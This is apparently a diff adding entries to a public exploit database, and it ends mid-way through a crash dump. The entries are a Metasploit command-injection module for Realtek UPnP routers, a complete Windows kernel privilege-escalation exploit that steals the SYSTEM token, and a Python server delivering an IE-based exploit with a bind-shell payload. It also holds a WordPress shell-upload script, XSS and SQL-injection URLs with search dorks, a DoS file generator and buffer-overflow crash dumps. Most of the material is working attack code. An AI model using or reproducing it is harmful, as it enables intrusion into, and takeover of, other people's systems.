N/A + +Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true +EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz + +Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html \ No newline at end of file diff --git a/platforms/linux/remote/37169.rb b/platforms/linux/remote/37169.rb new file mode 100755 index 000000000..1e3ef7f2d --- /dev/null +++ b/platforms/linux/remote/37169.rb @@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', + 'Description' => %q{ + Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command + injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, + there is no output for the executed command. This module has been tested successfully on a + Trendnet TEW-731BR router with emulation. + }, + 'Author' => + [ + 'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-8361'], + ['ZDI', '15-155'], + ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], + ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] + ], + 'DisclosureDate' => 'Apr 24 2015', + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => + [ + [ 'MIPS Little Endian', + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE + } + ], + [ 'MIPS Big Endian', + { + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE + } + ] + ], + 'DefaultTarget' => 0 + )) + + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') + + register_options( + [ + Opt::RPORT(52869) # port of UPnP SOAP webinterface + ], self.class) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/picsdesc.xml' + }) + if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/ + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + print_status("#{peer} - Trying to access the device ...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") + end + + print_status("#{peer} - Exploiting...") + + execute_cmdstager( + :flavour => :echo, + :linemax => 50, + :nodelete => true + ) + end + + def execute_command(cmd, opts) + uri = '/wanipcn.xml' + soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' + data_cmd = '' + build_soap_req + + begin + res = send_request_cgi({ + 'uri' => uri, + 'vars_get' => { + 'service' => 'WANIPConn1' + }, + 'ctype' => 'text/xml', + 'method' => 'POST', + 'headers' => { + 'SOAPAction' => soap_action + }, + 'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`") + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end + + def build_soap_req + new_external_port = rand(32767) + 32768 + new_internal_port = rand(32767) + 32768 + + xml = Document.new + + xml.add_element( + 'SOAP-ENV:Envelope', + { + 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', + 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' + }) + + xml.root.add_element('SOAP-ENV:Body') + + body = xml.root.elements[1] + + body.add_element( + 'm:AddPortMapping', + { + 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' + }) + + port_mapping = body.elements[1] + port_mapping.add_element('NewLeaseDuration') + port_mapping.add_element('NewInternalClient') + port_mapping.add_element('NewEnabled') + port_mapping.add_element('NewExternalPort') + port_mapping.add_element('NewRemoteHost') + port_mapping.add_element('NewProtocol') + port_mapping.add_element('NewInternalPort') + + port_mapping.elements['NewLeaseDuration'].text = '' + port_mapping.elements['NewInternalClient'].text = 'CMD_HERE' + port_mapping.elements['NewEnabled'].text = '1' + port_mapping.elements['NewExternalPort'].text = "#{new_external_port}" + port_mapping.elements['NewRemoteHost'].text = '' + port_mapping.elements['NewProtocol'].text = 'TCP' + port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}" + + xml.to_s + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/37050.txt b/platforms/php/webapps/37050.txt new file mode 100755 index 000000000..f3579298a --- /dev/null +++ b/platforms/php/webapps/37050.txt @@ -0,0 +1,11 @@ +# Exploit Title: Chronosite 5.12 SQL Injection +# Google Dork: filetype:php inurl:"/archives.php" intext:"ARCHIVES Chrono-site" +# Date: 13/05/15 +# Exploit Author: Wad Deek +# Vendor Homepage: http://www.chronosite.org/ +# Software Link: http://www.chronosite.org/chrono_upload/chronosite_512.zip +# Version: 5.12 +# Tested on: Xampp on Windows7 +################################################################ +PoC = http://127.0.0.1/cms/chronosite_512/archives.php?numero=%27 +################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/37155.txt b/platforms/php/webapps/37155.txt new file mode 100755 index 000000000..5f6930ccb --- /dev/null +++ b/platforms/php/webapps/37155.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53497/info + +WP-FaceThumb is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +WP-FaceThumb 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/?page_id=1&pagination_wp_facethumb=1"> \ No newline at end of file diff --git a/platforms/php/webapps/37156.txt b/platforms/php/webapps/37156.txt new file mode 100755 index 000000000..6f0004b02 --- /dev/null +++ b/platforms/php/webapps/37156.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53501/info + +GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +GetSimple CMS 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/getsimple/admin/theme.php?err=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/37157.txt b/platforms/php/webapps/37157.txt new file mode 100755 index 000000000..dc5fb3a8a --- /dev/null +++ b/platforms/php/webapps/37157.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53501/info + +GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +GetSimple CMS 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/getsimple/admin/pages.php?error=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/37158.txt b/platforms/php/webapps/37158.txt new file mode 100755 index 000000000..0dc1cd583 --- /dev/null +++ b/platforms/php/webapps/37158.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/53501/info + +GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +GetSimple CMS 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/getsimple/admin/index.php?success=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E +http://www.example.com/getsimple/admin/index.php?err=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E \ No newline at end of file diff --git a/platforms/php/webapps/37159.txt b/platforms/php/webapps/37159.txt new file mode 100755 index 000000000..4e05912a3 --- /dev/null +++ b/platforms/php/webapps/37159.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53501/info + +GetSimple CMS is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +GetSimple CMS 3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/getsimple/admin/upload.php?path=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20width=800%20height=800%3E&newfolder=rem0ve \ No newline at end of file diff --git a/platforms/php/webapps/37161.txt b/platforms/php/webapps/37161.txt new file mode 100755 index 000000000..fa7a6e3af --- /dev/null +++ b/platforms/php/webapps/37161.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53511/info + +The GRAND Flash Album Gallery plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +GRAND Flash Album Gallery 1.71 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-admin/admin.php?page=flag-skins&skin=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37162.txt b/platforms/php/webapps/37162.txt new file mode 100755 index 000000000..706a0cc1b --- /dev/null +++ b/platforms/php/webapps/37162.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/53513/info + +Dynamic Widgets plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Dynamic Widgets 1.5.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-admin/themes.php?page=dynwid-config&action=edit&id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37166.php b/platforms/php/webapps/37166.php new file mode 100755 index 000000000..0bf4db439 --- /dev/null +++ b/platforms/php/webapps/37166.php @@ -0,0 +1,24 @@ +################################################################################################### +# Exploit Title: WordPress dzs-zoomsounds Plugins Remote File Upload Vulnerability +# Vendor : http://digitalzoomstudio.net/docs/wpzoomsounds/ +# Author: bl4ck-dz +# Date: 28/05/2015 +# Infected File: upload.php +# Category: webapps +# Google dork:inurl:/wp-content/plugins/dzs-zoomsounds/ +# Tested on : Linux | Windows +################################################################################################### +"@$evil")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); curl_close($ch); +echo "$postResult"; +?> +Shell Access : +http://127.0.0.1/wp-content/plugins/dzs-zoomsounds/admin/upload/$Evil + +# GreeTz : Akram Stelle ~ Mr DZ ~ All DzTeaM Members & all all Dz H4x0rs ! \ No newline at end of file diff --git a/platforms/windows/dos/37160.pl b/platforms/windows/dos/37160.pl new file mode 100755 index 000000000..345654fb3 --- /dev/null +++ b/platforms/windows/dos/37160.pl @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/53508/info + +Universal Reader is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +Universal Reader 1.16.740.0 is vulnerable; other versions may also be affected. + +#!/usr/bin/perl -w +$filename="a"x129; +print "------Generate testfile \"a\"x129.epub------\n"; +open(TESTFILE, ">$filename.epub"); +sleep(3); +close(TESTFILE); +print "------Complete!------\n"; +exit(1); + diff --git a/platforms/windows/local/37098.txt b/platforms/windows/local/37098.txt new file mode 100755 index 000000000..a0826d777 --- /dev/null +++ b/platforms/windows/local/37098.txt @@ -0,0 +1,352 @@ +// ex.cpp +/* + Windows XP/2K3/VISTA/2K8/7 WM_SYSTIMER Kernel EoP + CVE-2015-0003 + March 2015 (Public Release: May 24, 2015) + + Tested on: + x86: Win 7 SP1 | Win 2k3 SP2 | Win XP SP3 + x64: Win 2k8 SP1 | Win 2k8 R2 SP1 + + Author: Skylake - skylake mail com +*/ + +#include "ex.h" + +_ZwAllocateVirtualMemory ZwAllocateVirtualMemory; +_PsLookupProcessByProcessId PsLookupProcessByProcessId; +_PsReferencePrimaryToken PsReferencePrimaryToken; +DWORD Pid; +ATOM atom; +BOOL KrnlMode, bSpawned; + +DWORD_PTR WINAPI pti() +{ +#ifdef _M_X64 + LPBYTE p = ( LPBYTE ) __readgsqword( 0x30 ); + return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x78 ) ); +#else + LPBYTE p = ( LPBYTE ) __readfsdword( 0x18 ); + return ( DWORD_PTR ) *( ( PDWORD_PTR ) ( p + 0x40 ) ); +#endif +} + +BOOL find_and_replace_member( PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize ) +{ + DWORD_PTR dwIndex, dwMask; + +#ifdef _M_X64 + dwMask = ~0xf; +#else + dwMask = ~7; +#endif + // + dwCurrentValue &= dwMask; + + for( dwIndex = 0; dwIndex < dwMaxSize; dwIndex++ ) + { + if( ( pdwStructure[dwIndex] & dwMask ) == dwCurrentValue ) + { + // + pdwStructure[dwIndex] = dwNewValue; + return TRUE; + } + } + + return FALSE; +} + +BOOL WINAPI Init() +{ + HMODULE hMod = NULL; + PVOID Base = NULL; + OSVERSIONINFO ov = { sizeof( OSVERSIONINFO ) }; + PSYSTEM_MODULE_INFORMATION pm = NULL; + BOOL RetVal = FALSE; + + __try { + + if( !GetVersionEx( &ov ) ) __leave; + + if( ov.dwMajorVersion == 5 && ov.dwMinorVersion > 0 ) + { + atom = 0xc039; + } + + else if( ov.dwMajorVersion == 6 && ov.dwMinorVersion < 2 ) + { + atom = ( ov.dwMinorVersion == 1 ) ? 0xc03c : 0xc03a; + } + + if( !atom ) __leave; + + _ZwQuerySystemInformation ZwQuerySystemInformation = ( _ZwQuerySystemInformation ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwQuerySystemInformation" ); + if( !ZwQuerySystemInformation ) __leave; + + ZwAllocateVirtualMemory = ( _ZwAllocateVirtualMemory ) GetProcAddress( GetModuleHandle( TEXT( "ntdll.dll" ) ), "ZwAllocateVirtualMemory" ); + if( !ZwAllocateVirtualMemory ) __leave; + + ULONG len; + LONG status = ZwQuerySystemInformation( SystemModuleInformation, NULL, 0, &len ); + if( !status ) __leave; + + pm = ( PSYSTEM_MODULE_INFORMATION ) LocalAlloc( LMEM_ZEROINIT, len ); + if( !pm ) __leave; + status = ZwQuerySystemInformation( SystemModuleInformation, pm, len, &len ); + if( status ) __leave; + + CHAR szKrnl[MAX_PATH] = { 0 }, *t; + + for( ULONG i = 0; i < pm->Count; ++i ) + { + if( strstr( pm->Module[i].ImageName, "exe" ) ) + { + t = strstr( pm->Module[i].ImageName, "nt" ); + if( t ) + { + strcpy_s( szKrnl, _countof( szKrnl ) - 1, t ); + Base = pm->Module[i].Base; + break; + } + } + } + + hMod = LoadLibraryA( szKrnl ); + + if( !hMod || !Base ) __leave; + + PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) GetProcAddress( hMod, "PsLookupProcessByProcessId" ); + if( !PsLookupProcessByProcessId ) __leave; + + PsLookupProcessByProcessId = ( _PsLookupProcessByProcessId ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsLookupProcessByProcessId - ( DWORD_PTR ) hMod ) ); + + PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) GetProcAddress( hMod, "PsReferencePrimaryToken" ); + + if( !PsReferencePrimaryToken ) __leave; + + PsReferencePrimaryToken = ( _PsReferencePrimaryToken ) ( ( DWORD_PTR ) Base + ( ( DWORD_PTR ) PsReferencePrimaryToken - ( DWORD_PTR ) hMod ) ); + Pid = GetCurrentProcessId(); + RetVal = TRUE; + } + + __finally { + if( pm ) LocalFree( pm ); + if( hMod ) FreeLibrary( hMod ); + } + + return RetVal; +} + +LRESULT CALLBACK ShellCode( HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam ) +{ + LPVOID pCurProcess = NULL; + LPVOID pSystemInfo = NULL; + PACCESS_TOKEN systemToken; + PACCESS_TOKEN targetToken; + + PsLookupProcessByProcessId( ( HANDLE ) Pid, &pCurProcess ); + PsLookupProcessByProcessId( ( HANDLE ) 4, &pSystemInfo ); + + targetToken = PsReferencePrimaryToken( pCurProcess ); + systemToken = PsReferencePrimaryToken( pSystemInfo ); + + // + find_and_replace_member( ( PDWORD_PTR ) pCurProcess, + ( DWORD_PTR ) targetToken, + ( DWORD_PTR ) systemToken, + 0x200 ); + KrnlMode = TRUE; + return 0; +} + +VOID WINAPI leave() +{ + keybd_event( VK_ESCAPE, 0, 0, NULL ); + keybd_event( VK_ESCAPE, 0, KEYEVENTF_KEYUP, NULL ); + keybd_event( VK_LWIN, 0, KEYEVENTF_KEYUP, NULL ); +} + +LRESULT CALLBACK WndProc( HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam ) +{ + if( bSpawned ) + { + leave(); + ExitProcess( 0 ); + } + + switch( message ) + { + case WM_CREATE: + SetTimer( hWnd, ID_TIMER, 1000 * 3, NULL ); + FlashWindow( hWnd, TRUE ); + keybd_event( VK_LWIN, 0, 0, NULL ); + break; + case WM_CLOSE: + DestroyWindow( hWnd ); + break; + case WM_DESTROY: + PostQuitMessage( 0 ); + break; + case WM_TIMER: + KillTimer( hWnd, ID_TIMER ); + leave(); + DestroyWindow( hWnd ); + break; + default: + return DefWindowProc( hWnd, message, wParam, lParam ); + } + return 0; +} + +int APIENTRY _tWinMain( _In_ HINSTANCE hInstance, + _In_opt_ HINSTANCE hPrevInstance, + _In_ LPTSTR lpCmdLine, + _In_ int nCmdShow ) +{ + WNDCLASSEX wc = { sizeof( WNDCLASSEX ) }; + HWND hWnd = NULL; + MSG Msg = { 0 }; + + SIZE_T size = 0x1000; + LPVOID addr = ( LPVOID ) 1; + + if( !Init() ) return 1; + + if( ZwAllocateVirtualMemory( ( HANDLE ) -1, &addr, 0, &size, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ) ) + { + // + return 1; + } + + DWORD_PTR p = pti(); + if( !p ) return 1; + +#ifdef _M_X64 + *( ( PDWORD_PTR ) 0x10 ) = p; + *( ( LPBYTE ) 0x2a ) = 4; + *( ( LPVOID* ) 0x90 ) = ( LPVOID ) ShellCode; + *( ( PDWORD_PTR ) 0xa8 ) = 0x400; + *( ( LPDWORD ) 0x404 ) = 1; + *( ( PDWORD_PTR ) 0x408 ) = 0x800; + *( ( LPWORD ) 0x410 ) = atom; + *( ( LPBYTE ) 0x412 ) = 1; +#else + *( ( LPDWORD ) 0x08 ) = p; + *( ( LPBYTE ) 0x16 ) = 4; + *( ( LPVOID* ) 0x60 ) = ( LPVOID ) ShellCode; + *( ( LPDWORD ) 0x6c ) = 0x400; + *( ( LPDWORD ) 0x404 ) = 1; + *( ( LPDWORD ) 0x408 ) = 0x800; + *( ( LPWORD ) 0x40c ) = atom; + *( ( LPBYTE ) 0x40e ) = 1; +#endif + + wc.lpfnWndProc = WndProc; + wc.hInstance = hInstance; + wc.lpszClassName = TEXT( "Class" ); + + if( !RegisterClassEx( &wc ) ) + return 1; + hWnd = CreateWindowEx( + WS_EX_CLIENTEDGE, + TEXT( "Class" ), + TEXT( "Window" ), + WS_OVERLAPPEDWINDOW, + CW_USEDEFAULT, CW_USEDEFAULT, 200, 100, + NULL, NULL, hInstance, NULL ); + if( !hWnd ) + return 1; + ShowWindow( hWnd, SW_HIDE ); + UpdateWindow( hWnd ); + + while( GetMessage( &Msg, NULL, 0, 0 ) ) + { + if ( Msg.message == WM_SYSTIMER ) // Borrowed from http://blog.beyondtrust.com/fuzzing-for-ms15-010 + { + if( !KrnlMode ) + { + Msg.hwnd = ( HWND ) NULL; + } + else + { + Msg.hwnd = hWnd; + if( !bSpawned ) + { + ShellExecute( NULL, TEXT( "open" ), TEXT( "cmd.exe" ), NULL, NULL, SW_SHOW ); + bSpawned = TRUE; + } + } + } + + TranslateMessage( &Msg ); + DispatchMessage( &Msg ); + } + + return ( int ) Msg.wParam; +} +// EOF + + + + + + +//ex.h + +#pragma once + +#include +#include +#include + +typedef NTSTATUS ( WINAPI *_ZwAllocateVirtualMemory ) ( + _In_ HANDLE ProcessHandle, + _Inout_ PVOID *BaseAddress, + _In_ ULONG_PTR ZeroBits, + _Inout_ PSIZE_T RegionSize, + _In_ ULONG AllocationType, + _In_ ULONG Protect + ); + +typedef NTSTATUS ( WINAPI *_PsLookupProcessByProcessId ) ( + _In_ HANDLE ProcessId, + _Out_ PVOID *Process + ); + +typedef PACCESS_TOKEN ( WINAPI *_PsReferencePrimaryToken ) ( + _Inout_ PVOID Process + ); + +typedef enum _SYSTEM_INFORMATION_CLASS { + SystemBasicInformation = 0, + SystemModuleInformation = 11 +} SYSTEM_INFORMATION_CLASS; + +typedef NTSTATUS ( WINAPI *_ZwQuerySystemInformation ) ( + _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, + _Inout_ PVOID SystemInformation, + _In_ ULONG SystemInformationLength, + _Out_opt_ PULONG ReturnLength + ); + +typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { + HANDLE Section; + PVOID MappedBase; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT PathLength; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Count; + SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + +#define ID_TIMER 0x1 +#define WM_SYSTIMER 0x118 +// EOF \ No newline at end of file diff --git a/platforms/windows/remote/37163.py b/platforms/windows/remote/37163.py new file mode 100755 index 000000000..ca0207918 --- /dev/null +++ b/platforms/windows/remote/37163.py @@ -0,0 +1,239 @@ +#!/usr/bin/python + +import BaseHTTPServer, socket + +## +# IBM Security AppScan Standard OLE Automation Array Remote Code Execution +# +# Author: Naser Farhadi +# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 +# +# Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 +# +# Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ +# if you able to exploit IE then you can exploit appscan and acunetix ;) +# This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And +# Metasploit windows/shell_bind_tcp Executable Payload +# +# Usage: +# chmod +x appscan.py +# ./appscan.py +# ... +# nc 172.20.10.14 333 +# +# Video: http://youtu.be/hPs1zQaBLMU +## + +class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): + def do_GET(req): + req.send_response(200) + if req.path == "/payload.exe": + req.send_header('Content-type', 'application/exe') + req.end_headers() + exe = open("payload.exe", 'rb') + req.wfile.write(exe.read()) + exe.close() + else: + req.send_header('Content-type', 'text/html') + req.end_headers() + req.wfile.write("""Please scan me! + """) + +if __name__ == '__main__': + sclass = BaseHTTPServer.HTTPServer + server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) + print "Http server started", socket.gethostbyname(socket.gethostname()), 80 + try: + server.serve_forever() + except KeyboardInterrupt: + pass + server.server_close() \ No newline at end of file diff --git a/platforms/windows/remote/37165.py b/platforms/windows/remote/37165.py new file mode 100755 index 000000000..ab073f9e3 --- /dev/null +++ b/platforms/windows/remote/37165.py @@ -0,0 +1,157 @@ +#!/usr/bin/python +#Exploit Title:WebDrive Buffer OverFlow PoC +#Author: metacom +#Vendor Homepage: http://www.webdrive.com/products/webdrive/ +#Software Link: https://www.webdrive.com/products/webdrive/download/ +#Version: 12.2 (build # 4172) 32 bit +#Date found: 31.05.2015 +#Date published: 31.05.2015 +#Platform: Windows 7 Ultimate +#Bug: Multiple Buffer Overflow UNICODE +''' +---------------------------------------------------------------------------- +Summary: +Unlike a typical FTP client, WebDrive allows you to open and +edit server-based, files without the additional step of downloading the file. +Using a simple wizard, you assign a network drive letter to the FTP Server. +WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and +maps a drive letter to each of these servers.You can map unique drive letters +to multiple servers.Download the full-function 20-day trial of WebDrive and +make file management on remote servers easier and more efficient! +------------------------------------------------------------------------------ +WebDrive connects to many types of web servers, +as well as servers in the cloud.You can use WebDrive +to access your files on all of the following server +types and protocols: + +WebDAV ------------>Vulnerable +WebDAV over SSL---->Vulnerable +FTP---------------->Vulnerable +FTP over SSL------->Vulnerable +Amazon S3---------->Vulnerable +SFTP--------------->Vulnerable +FrontPage Server--->Vulnerable + +------------------------------------------------------------------------------ +How to Crash: + +Copy the AAAA...string from WebDrive.txt to clipboard, create a connection +and paste it in the URL/Address and attempt to connect. + + +WebDAV +============================ +Crash Analysis using WinDBG: +============================ +(430.9f8): Access violation - code c0000005 (!!! second chance !!!) +eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c +eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 +*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe +webdrive+0x30ff2b: +0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=???? +0:000> !exchain +001c8d20: webdrive+35a24e (005aa24e) +001cb768: webdrive+1c0041 (00410041) +Invalid exception stack at 00410041 +0:000> d 001cb768 +001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. +001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. + +WebDAV over SSL +============================ +Crash Analysis using WinDBG: +============================ +(b88.ca0): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000 +eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - +ipworks9!IPWorks_SNPP_Get+0x57f: +00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=???????? +0:000>!exchain +Invalid exception stack at 00410041 + +FTP and FTP over SSL +============================ +Crash Analysis using WinDBG: +============================ +(834.70c): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000 +eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 +ntdll!KiFastSystemCallRet: +775e64f4 c3 ret +0:000> !exchain +002d8c1c: webdrive+35a24e (015da24e) +002db664: 00410041 +Invalid exception stack at 00410041 + +Amazon S3 +============================ +Crash Analysis using WinDBG: +============================ +(a64.a98): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000 +eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 +ntdll!KiFastSystemCallRet: +775e64f4 c3 ret +0:000> !exchain +002f8c7c: webdrive+35a24e (015da24e) +002fb6c4: 00410041 +Invalid exception stack at 00410041 + +SFTP +============================ +Crash Analysis using WinDBG: +============================ +(848.9a8): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000 +eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 +ntdll!KiFastSystemCallRet: +775e64f4 c3 ret +0:000> !exchain +00238824: webdrive+35a24e (015da24e) +0023b26c: 00410041 +Invalid exception stack at 00410041 + +FrontPage Server +============================ +Crash Analysis using WinDBG: +============================ +(cd4.710): Access violation - code c0000005 (!!! second chance !!!) +eax=007ba9f0 ebx=05d29738 ecx=00000041 